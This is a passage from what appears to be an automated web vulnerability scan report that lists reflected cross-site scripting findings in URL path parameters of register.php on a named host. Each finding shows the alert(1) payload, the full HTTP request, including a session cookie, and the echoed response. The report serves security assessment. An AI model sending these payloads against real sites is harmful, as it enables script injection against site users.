The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8fae6%3balert(1)//d331dc424a5 was submitted in the REST URL parameter 3. This input was echoed as 8fae6;alert(1)//d331dc424a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images8fae6%3balert(1)//d331dc424a5/icons/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images8fae6;alert(1)//d331dc424a5/icons/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.184. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ae1b%3balert(1)//d0063734710 was submitted in the REST URL parameter 4. This input was echoed as 3ae1b;alert(1)//d0063734710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons3ae1b%3balert(1)//d0063734710/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:22 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons3ae1b;alert(1)//d0063734710/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.185. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ae23"-alert(1)-"63f8fb2bbda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons9ae23"-alert(1)-"63f8fb2bbda/bullet_orange.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons9ae23"-alert(1)-"63f8fb2bbda/bullet_orange.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.186. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6383"-alert(1)-"f0a51632d0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.pnga6383"-alert(1)-"f0a51632d0d HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:33 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/bullet_orange.pnga6383"-alert(1)-"f0a51632d0d?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.187. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 41927%3balert(1)//7eadb8d4895 was submitted in the REST URL parameter 5. This input was echoed as 41927;alert(1)//7eadb8d4895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png41927%3balert(1)//7eadb8d4895 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:30 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/bullet_orange.png41927;alert(1)//7eadb8d4895?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.188. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0d02"-alert(1)-"a40efa800ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Ca0d02"-alert(1)-"a40efa800ea/images/icons/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:16 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a0d02"-alert(1)-"a40efa800ea/images/icons/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.189. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce270%3balert(1)//1e635729bf6 was submitted in the REST URL parameter 2. This input was echoed as ce270;alert(1)//1e635729bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cce270%3balert(1)//1e635729bf6/images/icons/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:17 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<ce270;alert(1)//1e635729bf6/images/icons/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.190. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ea7"><script>alert(1)</script>3b6cb39c4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/43ea7"><script>alert(1)</script>3b6cb39c4f1/images/icons/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/43ea7"><script>alert(1)</script>3b6cb39c4f1/images/icons/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.191. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2390"-alert(1)-"5d269465a6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagese2390"-alert(1)-"5d269465a6e/icons/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:17:37 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagese2390"-alert(1)-"5d269465a6e/icons/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.192. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ffbb%3balert(1)//c1552cd4887 was submitted in the REST URL parameter 3. This input was echoed as 7ffbb;alert(1)//c1552cd4887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images7ffbb%3balert(1)//c1552cd4887/icons/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:17:49 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images7ffbb;alert(1)//c1552cd4887/icons/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.193. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 34f6c%3balert(1)//16e7e4ef2f8 was submitted in the REST URL parameter 4. This input was echoed as 34f6c;alert(1)//16e7e4ef2f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons34f6c%3balert(1)//16e7e4ef2f8/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:22:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons34f6c;alert(1)//16e7e4ef2f8/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.194. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df84a"-alert(1)-"ccbe163dc50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/iconsdf84a"-alert(1)-"ccbe163dc50/cross.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:51 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/iconsdf84a"-alert(1)-"ccbe163dc50/cross.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.195. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a26f4"-alert(1)-"aa027df5bd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.pnga26f4"-alert(1)-"aa027df5bd4 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:24:28 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
